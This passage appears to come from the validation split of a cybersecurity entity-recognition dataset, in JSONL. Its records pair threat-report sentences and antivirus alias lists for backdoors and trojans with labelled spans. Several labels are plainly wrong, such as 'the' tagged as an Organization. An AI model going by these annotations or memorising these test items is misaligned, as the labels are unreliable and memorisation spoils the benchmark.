Trojan/Win32.HDC.C161182 HackTool.Samples Trj/CI.A Win32/Trojan.Hacktool.3bb", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000280", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Dynamer.28147 Backdoor.Win32.Wonknu.a Trojan.Win32.Ocna.edtwqs Backdoor:W32/Wonknu.A Backdoor.Wonknu.a Trojan[Backdoor]/Win32.Wonknu Backdoor.Win32.Wonknu.a Backdoor:Win32/Jadow.A Trojan/Win32.Jadow.R172147 Trj/GdSda.A Win32.Backdoor.Wonknu.Phzv Win32/Trojan.ffd", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000281", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Buffyx Backdoor.Kingslayer.Win32.2 
Backdoor.Win32.Kingslayer.b Trojan.Win32.Kingslayer.emzhez TR/AD.BuffyX.lfbzh Trojan[Backdoor]/Win32.Kingslayer Backdoor.Win32.Kingslayer.b Backdoor.Kingslayer Win32.Backdoor.Kingslayer.Lkxo", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000282", "source": "cyner2_valid"}} {"text": "The possibility of cyberattacks was discovered in June this year, and there are fears that information may have been stolen from the computer terminal of a researcher at the university s Hydrogen Isotope Research Center.", "spans": {"Organization: researcher": [[156, 166]], "Organization: the": [[170, 173]]}, "info": {"id": "cyner2_valid_000283", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojandropper.Facido Trojan.FakeMS Trojan.Win32.Zusy.exkrtq BehavesLike.Win32.MultiPlug.bc TR/Crypt.ZPACK.gygzk Trojan.Zusy.D3EA88 TrojanDropper:Win32/Facido.A!bit Trj/GdSda.A Win32.Trojan.Zusy.Hwwm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000284", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Script.CLF Trojan/Dropper.Dapato.slg Win32/Jorik.KJ Trojan.Win32.Bicololo.azue Trojan.Script.CLF Trojan.Url.Iframe.ehmbbx Trojan:W32/Qhost.WE W32/Mdrop.FZY!tr Trojan:Win32/Puawn.A Trojan.Script.CLF Trojan.Win32.Bicololo.azue Trojan.Script.CLF Trojan/Win32.Qhost.C409857 Trojan.Bicololo Win32/Bicololo.FN Win32.Trojan.Bicololo.Anpx Trojan.Bicololo!p6ap5ydo3To Trojan.Win32.Bicololo Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000285", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.144B TSPY_ANOBRANK.SM1 Win32.Trojan.WisdomEyes.16070401.9500.9986 TSPY_ANOBRANK.SM1 Trojan.Win32.Mlw.ewwkni BehavesLike.Win32.Miuref.tc TR/Crypt.Xpack.sgdtn Trojan.Symmi.D13D25 Trojan/Win32.Black.C2087185", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000289", "source": "cyner2_valid"}} {"text": "It is clear that this RAT is under intense 
development , however , the addition and removal of packages , along with the huge quantity of unused code and usage of deprecated and old techniques denotes an amateur development methodology .", "spans": {}, "info": {"id": "cyner2_valid_000292", "source": "cyner2_valid"}} {"text": "Earlier this year , we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using DexClassLoader .", "spans": {}, "info": {"id": "cyner2_valid_000293", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Multi Win32.Trojan.WisdomEyes.16070401.9500.9667 Trojan-Downloader.Win32.PsDownload.apf Trojan-Dropper.MSIL.Binder TR/Dropper.MSIL.muysl Uds.Dangerousobject.Multi!c Trojan-Downloader.Win32.PsDownload.apf TrojanDownloader:PowerShell/Ploprolo.F Trj/GdSda.A Win32.Trojan-downloader.Psdownload.Alik MSIL/TrojanDropper.AFR!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000294", "source": "cyner2_valid"}} {"text": "It also harvests call details and SMS logs as shown below .", "spans": {}, "info": {"id": "cyner2_valid_000295", "source": "cyner2_valid"}} {"text": "Malware , phishing , and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center , allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint ’ s rich set of tools for detection , investigation , and response .", "spans": {"System: Microsoft Defender": [[51, 69], [253, 271]], "Organization: Microsoft Defender Security Center": [[103, 137]], "System: Windows": [[219, 226]]}, "info": {"id": "cyner2_valid_000296", "source": "cyner2_valid"}} {"text": "Once infected, the victim machine can be controlled by the attacker to perform basic remote-access trojan-like tasks including command execution and file upload and download.", "spans": {"System: victim machine": [[19, 33]], "Malware: remote-access trojan-like": 
[[85, 110]]}, "info": {"id": "cyner2_valid_000297", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/CoinMiner.s Win32.Trojan.WisdomEyes.16070401.9500.9995 PUA.Bitcoinminer Trojan.Win32.Mlw.dccbnk Trojan.Win32.Z.Coinminer.109056 Trojan.DownLoad.64603 BehavesLike.Win32.Trojan.ch Trojan-PSW.ILUSpy TrojanDropper.Dapato.gtv TrojanDownloader:MSIL/Downcoin.B Troj.Ransom.W32!c RiskWare.BitCoinMiner Win32/Trojan.Ransom.793", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000298", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Troj.Sms.Androidos!c Android.Trojan.Moavt.C ZIP/Trojan.AQYD-7 Android.Trojan.Moavt.C A.L.Rog.EvilCert.AAU Android.BackDoor.198 Android.Trojan.Moavt.C Android-PUP/Malct.46b11", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000300", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojandownloader.Muntsib Win32.Trojan.WisdomEyes.16070401.9500.9796 TROJ_DLOADR.PTJ Trojan.DownLoader8.62204 Trojan/Swisyn.abf TR/Samca.rxobe Trojan/Win32.Unknown Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Muntsib.A Trojan.DL.Muntsib!XmhOhF4BghY Trojan.Win32.Swisyn", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000301", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.15651 Trojan.Onlinegames PWS-OnlineGames.s Win32.Trojan.WisdomEyes.16070401.9500.9986 Infostealer.Gampass TROJ_GAMETHI.GDH Trojan.Win32.OnLineGames.bqyohw Trojan.Win32.Z.Onlinegames.15651 Troj.GameThief.W32.OnLineGames.uwrk!c TrojWare.Win32.Trojan.Inject.~II Trojan.PWS.Gamania.40251 Trojan.OnLineGames.Win32.20752 TROJ_GAMETHI.GDH PWS-OnlineGames.s Trojan/GamePass.aa Trojan[GameThief]/Win32.WOW.gic Win32.Troj.OnlineGameT.kcloud PWS:Win32/Yokoyou.A Trojan/Win32.OnlineGameHack.C66956 Win32.Trojan.Spy.Anpm Trojan-Downloader.Win32.Delf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000302", "source": "cyner2_valid"}} 
{"text": "Stage 3 : Installer that takes DLL side-loading to a new level Stage 3 represents the setup program for FinFisher .", "spans": {"Malware: FinFisher": [[104, 113]]}, "info": {"id": "cyner2_valid_000303", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TikoraxaDSB.Trojan Trojan.Script Win32.Trojan.WisdomEyes.16070401.9500.9718 W32/Snojan.S Trojan.Win32.VB.euvttr BehavesLike.Win32.Dropper.dh Trojan-Downloader.VBS.Small Trojan.HGRA-31 Trojan.Pincav.aer TR/VB.Small.jktqo TrojanDownloader:VBS/Sminager.I Trojan/Win32.CoinMiner.C2256512 Trojan.Snojan Trj/CI.A VBS/TrojanDownloader.Small.NGO Trojan.DL.Alien! Win32/Trojan.0b6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000305", "source": "cyner2_valid"}} {"text": "July 16 On the mobile front , a fake news app designed to bypass Google Play was discovered .", "spans": {"System: Google Play": [[65, 76]]}, "info": {"id": "cyner2_valid_000306", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 RTKT_KTDOOR.SMIA Trojan-Downloader.Win32.RtkDL.jtp Trojan.Win32.RtkDL.cwnuqz Trojan.Win32.A.Downloader.24832.B Trojan.DownLoad1.36015 RTKT_KTDOOR.SMIA Trojan.Rootkit Rootkit.Vanti.ehn Trojan[Downloader]/Win32.RtkDL Trojan-Downloader.Win32.RtkDL.jtp W32/Koutodoor.A!tr.rkit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000307", "source": "cyner2_valid"}} {"text": "Let ’ s take an in-depth look at Asacub 5.0.3 , the most widespread version in 2018 .", "spans": {"Malware: Asacub": [[33, 39]]}, "info": {"id": "cyner2_valid_000308", "source": "cyner2_valid"}} {"text": "Take for instance the fileless, code-injecting ransomware we've uncovered—SOREBRECT, which Trend Micro detects as RANSOM_SOREBRECT.A and RANSOM_SOREBRECT.B.", "spans": {"Malware: fileless, code-injecting ransomware": [[22, 57]], "Malware: uncovered—SOREBRECT,": [[64, 84]], "Organization: Trend Micro": [[91, 102]]}, "info": {"id": 
"cyner2_valid_000309", "source": "cyner2_valid"}} {"text": "On the other hand , dynamic analysis tools ( like debuggers or sandbox ) face the anti-debug and anti-analysis tricks hidden in the virtualized code itself that detects sandbox environments and alters the behavior of the malware .", "spans": {}, "info": {"id": "cyner2_valid_000310", "source": "cyner2_valid"}} {"text": "Figure 14 : Information theft via fake credit card verification using stolen branding Figure 15 : Information theft via fake credit card verification using stolen branding Some of the campaigns appear to have a wider reach based on bit.ly statistics like this one from October 13 , 2017 : Figure 16 : bit.ly statistics for an October 13 , 2017 campaign Over several days during the last three months , Proofpoint researchers observed campaigns using similar techniques targeting the banking customers of Raffeisen and Sparkasse .", "spans": {"Organization: Proofpoint": [[402, 412]]}, "info": {"id": "cyner2_valid_000311", "source": "cyner2_valid"}} {"text": "WolfRAT is a specifically targeted RAT which we assess to be aimed at Thai individuals and , based on previous work from Wolf Research , most likely used as an intelligence-gathering tool or interception tool .", "spans": {"Malware: WolfRAT": [[0, 7]], "Organization: Wolf Research ,": [[121, 136]]}, "info": {"id": "cyner2_valid_000312", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.MSILPerseus.DE36 Win32.Trojan.WisdomEyes.16070401.9500.9995 TR/Dldr.Banload.xacls TrojanDownloader:MSIL/Aguadi.A Trojan-Downloader.MSIL.Banload MSIL/Banload.CP!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000313", "source": "cyner2_valid"}} {"text": "Organizations who provide support services to these industries are also of interest.", "spans": {"Organization: Organizations": [[0, 13]], "Organization: industries": [[52, 62]]}, "info": {"id": "cyner2_valid_000314", "source": "cyner2_valid"}} {"text": "In the 
subsequent sections, we'll detail the various stages of the TeslaCrypt 4.1A attack chain, moving from infiltration to detection evasion, anti-analysis and evasion features, entrenchment, and the malicious mission, concluding with some points on the user experience.", "spans": {"Malware: TeslaCrypt 4.1A": [[67, 82]], "System: user experience.": [[256, 272]]}, "info": {"id": "cyner2_valid_000315", "source": "cyner2_valid"}} {"text": "Although multi-step overlays are not something new , their usage is generally limited to avoid raising suspicion .", "spans": {}, "info": {"id": "cyner2_valid_000316", "source": "cyner2_valid"}} {"text": "List of C2s used by Buhtrap", "spans": {"Malware: Buhtrap": [[20, 27]]}, "info": {"id": "cyner2_valid_000317", "source": "cyner2_valid"}} {"text": "Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C & C server .", "spans": {"System: Google Play": [[63, 74]]}, "info": {"id": "cyner2_valid_000318", "source": "cyner2_valid"}} {"text": "Remote Administration Tools RAT have been around for a long time.", "spans": {"Malware: Remote Administration Tools RAT": [[0, 31]]}, "info": {"id": "cyner2_valid_000319", "source": "cyner2_valid"}} {"text": "Allows an application to write SMS messages .", "spans": {}, "info": {"id": "cyner2_valid_000320", "source": "cyner2_valid"}} {"text": "Since then, we have continued our research into the Command and Control C2 infrastructure associated with KASPERAGENT and MICROPSIA.", "spans": {"Malware: KASPERAGENT": [[106, 117]], "Malware: MICROPSIA.": [[122, 132]]}, "info": {"id": "cyner2_valid_000321", "source": "cyner2_valid"}} {"text": "The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments.", "spans": {}, "info": {"id": "cyner2_valid_000323", "source": "cyner2_valid"}} {"text": "IT people are known for having more access and permissions inside their 
organizations than other employees, mainly because they need to manage and operate the infrastructure.", "spans": {"Organization: IT people": [[0, 9]], "Organization: organizations": [[72, 85]], "System: the infrastructure.": [[155, 174]]}, "info": {"id": "cyner2_valid_000324", "source": "cyner2_valid"}} {"text": "After installation , the user needs to run the application .", "spans": {}, "info": {"id": "cyner2_valid_000325", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Win32.Androm.outd Trojan.DownLoader9.21403 BehavesLike.Win32.Trojan.ct Trojan:Win32/Redyms.A Backdoor.Win32.Androm.outd Trojan.Kryptik!Tb6rnBsmOnc Trojan.Win32.Redyms W32/Kryptik.BAAC!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000327", "source": "cyner2_valid"}} {"text": "This article is on a new strain', it dates to March this year from what I can tell.", "spans": {"Malware: new strain',": [[21, 33]]}, "info": {"id": "cyner2_valid_000328", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Llac.adnr Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan.Win32.Llac.uvopl Worm.Win32.Injector.BA BackDoor.Cybergate.1 BehavesLike.Win32.PWSZbot.cc Trojan/Llac.fff Trojan/Win32.Llac Trojan.Graftor.D5D002 Trojan:Win32/Anaki.A!gfc Virus.Win32.Heur Win32/Trojan.a87", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000329", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Winnti Trojan/Rootkitdrv.a Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.ENJV-1442 Backdoor.Winnti Backdoor.Win32.S.Winnti.270336 Trojan.DownLoader5.54034 Trojan.Rootkitdrv.Win32.23 BehavesLike.Win32.VTFlooder.dc Trojan[Backdoor]/Win32.Winnti Win32.Hack.Winnti.kcloud Trojan.Zusy.D3BD7 Trojan:Win64/Winnti.A Win-Trojan/Backdoor.270336.C W32/Winnti.AI!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000330", "source": "cyner2_valid"}} {"text": 
"Dell SecureWorks Counter Threat UnitTM CTU researchers investigated activities associated with Threat Group-3390 TG-3390.", "spans": {"Organization: Dell SecureWorks Counter Threat UnitTM CTU researchers": [[0, 54]]}, "info": {"id": "cyner2_valid_000331", "source": "cyner2_valid"}} {"text": "Cobalt Strike has been their primary toolset for command and control within the victim networks, while BeEF has been used to assist in the initial infection process.", "spans": {"Malware: Cobalt Strike": [[0, 13]], "Malware: toolset": [[37, 44]], "System: networks,": [[87, 96]], "Malware: BeEF": [[103, 107]]}, "info": {"id": "cyner2_valid_000333", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Symmi.110 Win32.Trojan.WisdomEyes.16070401.9500.9974 Trojan.Win32.Scar.fzmk Heur.Packed.Unknown Trojan:W32/Kamala.A BehavesLike.Win32.Ransom.lc TrojanDownloader:Win32/Scar.D Trojan.Win32.Scar.fzmk Trojan.Scar Trj/CI.A Virus.Win32.Virut.tu Trojan.DL.Delf!Rolvsy/8gQo Trojan.Win32.Scar W32/Delf.QTN!tr Win32/Trojan.e4a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000334", "source": "cyner2_valid"}} {"text": "\" Users must realize that they can no longer trust in installing only apps with a high reputation from official app stores as their sole defense , '' the researchers wrote in an e-mail to Ars .", "spans": {"Organization: Ars": [[188, 191]]}, "info": {"id": "cyner2_valid_000335", "source": "cyner2_valid"}} {"text": "Disguised as Google related app , the core part of malware exploits various known Android vulnerabilities and automatically replaces installed apps on the device with malicious versions without the user ’ s interaction .", "spans": {"Organization: Google": [[13, 19]], "Vulnerability: Android vulnerabilities": [[82, 105]]}, "info": {"id": "cyner2_valid_000336", "source": "cyner2_valid"}} {"text": "These repackaged apps are peddled to unsuspecting users, mostly through third-party app stores.", "spans": {"Organization: 
users,": [[50, 56]], "System: third-party app stores.": [[72, 95]]}, "info": {"id": "cyner2_valid_000337", "source": "cyner2_valid"}} {"text": "Currently, it is designed to collect data from PoS systems running on Oracle® MICROS®, a platform popularly used in the hospitality, food and beverage, and retail industries.", "spans": {"System: PoS systems": [[47, 58]], "System: Oracle® MICROS®,": [[70, 86]], "System: platform": [[89, 97]], "Organization: hospitality, food": [[120, 137]], "Organization: beverage,": [[142, 151]], "Organization: retail industries.": [[156, 174]]}, "info": {"id": "cyner2_valid_000338", "source": "cyner2_valid"}} {"text": "First , they use the built-in toolbox commands to determine what apps are running .", "spans": {}, "info": {"id": "cyner2_valid_000339", "source": "cyner2_valid"}} {"text": "Installation process with administrative privilege This installation method is more interesting because it reveals how the malware tries to achieve stealthier persistence on the machine .", "spans": {}, "info": {"id": "cyner2_valid_000340", "source": "cyner2_valid"}} {"text": "The custom malware was submitted by a user in Bangladesh, and contains sophisticated functionality for interacting with local SWIFT Alliance Access software running in the victim infrastructure.", "spans": {"Malware: custom malware": [[4, 18]], "Organization: user": [[38, 42]], "System: SWIFT Alliance Access software": [[126, 156]], "System: victim infrastructure.": [[172, 194]]}, "info": {"id": "cyner2_valid_000341", "source": "cyner2_valid"}} {"text": "Given that there are a limited number of behaviors required to identify billing fraud , Bread apps have had to try a wide variety of techniques to mask usage of these APIs .", "spans": {"Malware: Bread": [[88, 93]]}, "info": {"id": "cyner2_valid_000343", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Starter.4385 Trojan.Zusy.D21C07 Backdoor:MSIL/Torwofun.B Trj/CI.A 
MSIL/Starter.AH!tr Win32/Trojan.aa2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000344", "source": "cyner2_valid"}} {"text": "The Sednit group—variously also known as APT28, Fancy Bear, Sofacy, Pawn Storm, STRONTIUM and Tsar Team—is a group of attackers operating since 2004 if not earlier, whose main objective is to steal confidential information from specific targets.", "spans": {"Organization: specific targets.": [[228, 245]]}, "info": {"id": "cyner2_valid_000345", "source": "cyner2_valid"}} {"text": "Spread command from C2 The victim receives the command sendSMSMass .", "spans": {}, "info": {"id": "cyner2_valid_000346", "source": "cyner2_valid"}} {"text": "Spammers are always evolving to get their messages to the end users by bypassing SPAM filters while still appearing convincing enough to get a user to complete the actions required to infect the system.", "spans": {"System: SPAM filters": [[81, 93]], "System: system.": [[195, 202]]}, "info": {"id": "cyner2_valid_000347", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 W32.Sality.U Win32.Sality.3 PE_SALITY.ER W32.Sality.AE Win32/Sality.AA PE_SALITY.ER Win32.Sality.3 Virus.Win32.Sality.bzkem Win32.Sality.3 Win32.Sector.30 Virus.Sality.Win32.25 BehavesLike.Win32.Sality.fh Virus.Win32.Sality Win32/HLLP.Kuku.poly2 W32/Sality.AT Win32.Sality.lx.368640 HackTool:Win32/SanmaoSMTPMailCracker.A Win32.Sality.3 Win32/Kashu.E Win32.Sality.3 Virus.Win32.Sality.bakb Win32.Sality Win32/Sality.NBA W32/Sality.AA Virus.Win32.Sality.I", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000348", "source": "cyner2_valid"}} {"text": "In fact, we think that the BlackEnergy group has evolved into the TeleBots group.", "spans": {}, "info": {"id": "cyner2_valid_000349", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Wuke.B Trojan.Wuke W32/Wuke.sys Dropper.Delf.Win32.5098 Troj.Dropper.W32.Delf.lqr!c RTKT_WUKE.AH 
Win32.Trojan.WisdomEyes.16070401.9500.9814 RTKT_WUKE.AH Win32.Wuke.B Win32.Wuke.B Win32.Wuke.B Win32.Wuke.B Win32.HLLW.Wuke Trojan.5 W32/Wuke.sys Trojan.Win32.Rootkit Backdoor/HookSSDT.ai Trojan[Dropper]/Win32.Delf Win32.Troj.Rootkit.kd.kcloud Trojan:Win32/Wuke.A!sys Win32/Runepo.E Win32.Wuke.B Trojan.5 Win32.Wuke.B Win32.Trojan.Wuke.Hprx Trojan.Wuke!7bT8/QLS+As W32/Wuke.AE!tr Win32/Trojan.Rootkit.5d4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000350", "source": "cyner2_valid"}} {"text": "This may indicate that valid, administrative level credentials were used against the host.", "spans": {"Organization: host.": [[85, 90]]}, "info": {"id": "cyner2_valid_000351", "source": "cyner2_valid"}} {"text": "We started with most frequently used C & C domains “ a * * * d.com ” , “ a * * * d.net ” , and “ a * * * d.org ” .", "spans": {}, "info": {"id": "cyner2_valid_000352", "source": "cyner2_valid"}} {"text": "In the case of Android devices , accessing the malicious website or pressing any of the buttons will prompt the download of the APK .", "spans": {"System: Android": [[15, 22]]}, "info": {"id": "cyner2_valid_000353", "source": "cyner2_valid"}} {"text": "Don ’ t install apps outside the official app store .", "spans": {}, "info": {"id": "cyner2_valid_000354", "source": "cyner2_valid"}} {"text": "Currently , such Trojans attack a limited number of bank customers , but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims .", "spans": {}, "info": {"id": "cyner2_valid_000355", "source": "cyner2_valid"}} {"text": "The following screenshots show what type of information is collected in both steps of the overlay attack : Ginp overlaysGinp overlaysGinp overlaysGinp overlays Based on Anubis Once the Anubis bot code got leaked , it was just a matter of time before new banking Trojans based on Anubis would surface .", "spans": {"Malware: Ginp": [[107, 111]], 
"Malware: Anubis": [[169, 175], [185, 191], [279, 285]]}, "info": {"id": "cyner2_valid_000356", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Multi TROJ_FMIC.NIL Win32.Trojan.WisdomEyes.16070401.9500.9969 Backdoor.Trojan.B TROJ_FMIC.NIL Uds.Dangerousobject.Multi!c Trojan.Win32.Webprefix", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000357", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Barok.1060921 Trojan-PSW.Win32.Barok.20 Trojan.Win32.Barok.dcuq Trojan.LoveLetter Trojan.Barok.Win32.18 Trojan/PSW.Barok.20 TR/Barok.PSW.10 Trojan-PSW.Win32.Barok.20 Trojan.PWS.Barok!R90hGVGYM8Y HEUR/QVM02.0.DAC3.Trojan-PSW.Win32.Barok", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000358", "source": "cyner2_valid"}} {"text": "Then, at some point, the information leaks out and cybercrime groups start using it more widely.", "spans": {}, "info": {"id": "cyner2_valid_000359", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Skubur.2.6 Backdoor/W32.Skubur.77824 Backdoor/Skubur.f W32/Risk.XSZR-8781 Backdoor.Trojan Win32/Skubur.F BKDR_SKUBUR.F Win.Trojan.Skubur-2 Backdoor.Skubur.2.6 Backdoor.Win32.Skubur.h Backdoor.Skubur.2.6 Trojan.Win32.Skubur.dnke Backdoor.W32.Skubur.h!c Win32.Backdoor.Skubur.Aglc Backdoor.Skubur.2.6 Backdoor.Win32.Skubur.F Backdoor.Skubur.2.6 Trojan.DownLoader8.54017 Backdoor.Skubur.Win32.5 Backdoor/Skubur.f Adware:Win32/DeBurrower.B BDS/Skubur.f Trojan[Backdoor]/Win32.Skubur Backdoor.Skubur.2.6 Backdoor.Win32.Skubur.h Backdoor:Win32/Skubur.F Trojan/Win32.HDC.C920 Backdoor.Skubur.2.6 Backdoor.Skubur Backdoor.Win32.Skubur.f W32/Skubur.F!tr.bdr Win32/Backdoor.216", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000360", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Padueta TSPY_PADU.SM Trojan.Awax TSPY_PADU.SM Trojan.Win32.Z.Small.10752.GG Trojan.MulDrop7.44616 W32/Trojan.CYEU-5546 
TR/Small.pjrjp Trojan:MSIL/Padueta.A Trj/GdSda.A Trojan.MSIL.Small MSIL/Small.AF!tr Win32/Trojan.4b2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000361", "source": "cyner2_valid"}} {"text": "The phishing emails and document files leveraged a variety of geopolitically sensitive subject matters as attractive lures, such as events in Beijing, the Dalai Lama, North Korea relations, the Zika virus, and various legitimate appearing announcements.", "spans": {"Organization: the Dalai Lama,": [[151, 166]]}, "info": {"id": "cyner2_valid_000362", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.A52C Trojan/W32.Stuh.67584.E Trojan/BHO.qkd Win32.Trojan.WisdomEyes.16070401.9500.9991 Win32/Vundo.CQO TROJ_VUNDO.SMZ Win.Trojan.Stuh-774 Packed.Win32.Krap.p Trojan.Win32.Stuh.67584.I ApplicUnsaf.Win32.Adware.SuperJuan.~H Trojan.Virtumod.based.25 Trojan.BHO.Win32.3425 TROJ_VUNDO.SMZ BehavesLike.Win32.Worm.kc Packer.Win32.Krap Trojan/Vundo.cby Trojan[Packed]/Win32.Krap Win32.Troj.PackerUndefT.eh.67650 Trojan.Krypt.12 Packed.Win32.Krap.p BScope.Trojan.Stuh.2 Trj/Zlob.MD", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000363", "source": "cyner2_valid"}} {"text": "Google Play has removed the apps and they stated that \" thanks to enhanced detection models , Google Play Protect will now be able to better detect future variants of these applications '' .", "spans": {"System: Google Play": [[0, 11]], "System: Google Play Protect": [[94, 113]]}, "info": {"id": "cyner2_valid_000365", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Riskware.Win32.ELEX.eskxqv Trojan.StartPage1.45115 Trojan.Inject.Win32.182207 BehavesLike.Win32.BadFile.tm PUP.Elex/Variant", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000367", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm.Stuxnet.B4 W32/Stuxnet.n Trojan.Win32.Stuxnet.bnpqw RTKT_STUXNET.A Trojan.Stuxnet-9 
Worm.Win32.Stuxnet.n Worm.Stuxnet!+pknika2LS4 Worm.Win32.A.Stuxnet.1286144[h] Worm.Win32.Stuxnet.K Trojan.Stuxnet.1 Worm.Stuxnet.Win32.44 RTKT_STUXNET.A BehavesLike.Win32.PWSOnlineGames.th TrojanDropper.Stuxnet.e WORM/Stuxnet.A.7 W32/Stuxnet.N!worm Worm/Win32.Stuxnet W32.W.Stuxnet.n!c Worm/Win32.Stuxnet Worm:Win32/Stuxnet.A Win32/Stuxnet.A SScope.Trojan-Spy.0485 Trj/CI.A Win32.Worm.Stuxnet.Ajbz Trojan.Win32.Stuxnet Worm.Win32.Stuxnet.n", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000368", "source": "cyner2_valid"}} {"text": "The malware cleans the system event logs using OpenEventLog/ClearEventLog APIs , and then terminates the setup procedure with a call to StartService to run the stage 4 malware .", "spans": {}, "info": {"id": "cyner2_valid_000369", "source": "cyner2_valid"}} {"text": "A new crypto-ransomware variant dubbed Petya detected by Trend Micro as RANSOM_PETYA.A.", "spans": {"Malware: crypto-ransomware variant": [[6, 31]], "Malware: Petya": [[39, 44]], "Organization: Trend Micro": [[57, 68]]}, "info": {"id": "cyner2_valid_000370", "source": "cyner2_valid"}} {"text": "Some indicators may come in the form of peculiar behavior such as unexpected rebooting , finding unfamiliar apps installed , or instant messaging apps suddenly freezing .", "spans": {}, "info": {"id": "cyner2_valid_000371", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Spy.Win32.Snifie.pff Trojan.Win32.Banker2.bjswk Trojan.DownLoader1.7798 Trojan.Banker.Win32.116680 BehavesLike.Win32.Virut.fc TrojanSpy.Snifie.m Trojan[Spy]/Win32.Snifie PWS:Win32/Verweli.A Trojan.Heur.ui0fr4pdzIjO Trojan-Spy.Win32.Snifie.pff TScope.Trojan.Delf Trj/Banker.MEK", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000372", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Wingbird Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.TURR-0822 TR/Crypt.ZPACK.pgagz Trojan:Win32/Wingbird.C!dha Trj/GdSda.A 
